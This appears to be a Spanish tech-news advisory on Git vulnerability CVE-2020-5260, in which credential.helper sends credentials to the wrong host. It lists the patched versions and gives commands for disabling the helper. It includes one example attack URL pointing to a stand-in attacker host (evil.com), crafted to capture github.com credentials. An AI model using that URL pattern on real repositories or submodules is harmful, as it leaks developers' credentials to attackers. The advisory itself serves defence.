Vulnerabilidad en Git que conduce a la filtración de credenciales

Publicado versiones corregidas del sistema de control de versiones distribuido Git 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 y 2.17.4, en las que se ha solucionado vulnerabilidad (CVE-2020-5260) en el manejador «credential.helper«, que provoca el envío de credenciales a un host incorrecto cuando un cliente git accede a un repositorio a través de una URL especialmente formada que contiene un símbolo de nueva línea. Esta vulnerabilidad puede ser utilizada para enviar credenciales de otro host al servidor controlado por un atacante.

Al especificar una URL del tipo «https://evil.com?host=github.com/», el controlador de credenciales al conectarse al host evil.com transmitirá los parámetros de autenticación configurados para github.com. El problema se manifiesta al realizar operaciones como «git clone», incluyendo el procesamiento de URL para submódulos (por ejemplo, al ejecutar «git submodule update», se procesarán automáticamente las URL especificadas en el archivo .gitmodules del repositorio). La vulnerabilidad representa el mayor riesgo en situaciones donde el desarrollador clona un repositorio sin ver la URL, por ejemplo, al trabajar con submódulos, o en sistemas que realizan acciones automáticas, como en scripts de construcción de paquetes.

Para bloquear la vulnerabilidad en las nuevas versiones prohibida la transmisión de símbolos de nueva línea en cualquier valor que se envíe a través del protocolo de intercambio de credenciales. Para las distribuciones, se puede verificar el lanzamiento de actualizaciones de paquetes en las páginas Debian, Ubuntu, RHEL, SUSE/openSUSE, Fedora, Arch, FreeBSD.

Como solución provisional para bloquear el problema se recomienda no utilizar credential.helper al acceder a repositorios públicos y no aplicar «git clone» en modo «—recurse-submodules» con repositorios no verificados. Para desactivar por completo el manejador credential.helper, que realiza la conservación y recuperación de contraseñas de la caché, protegido almacén o archivo de contraseñas, se pueden utilizar los comandos:

git config —unset credential.helper
git config —global —unset credential.helper
git config —system —unset credential.helper

Fuente: opennet.ru

Compra un hosting fiable para sitios web con protección contra DDoS, servidores VPS VDS 🔥 Compra un hosting fiable para sitios web con protección contra DDoS, servidores VPS VDS | ProHoster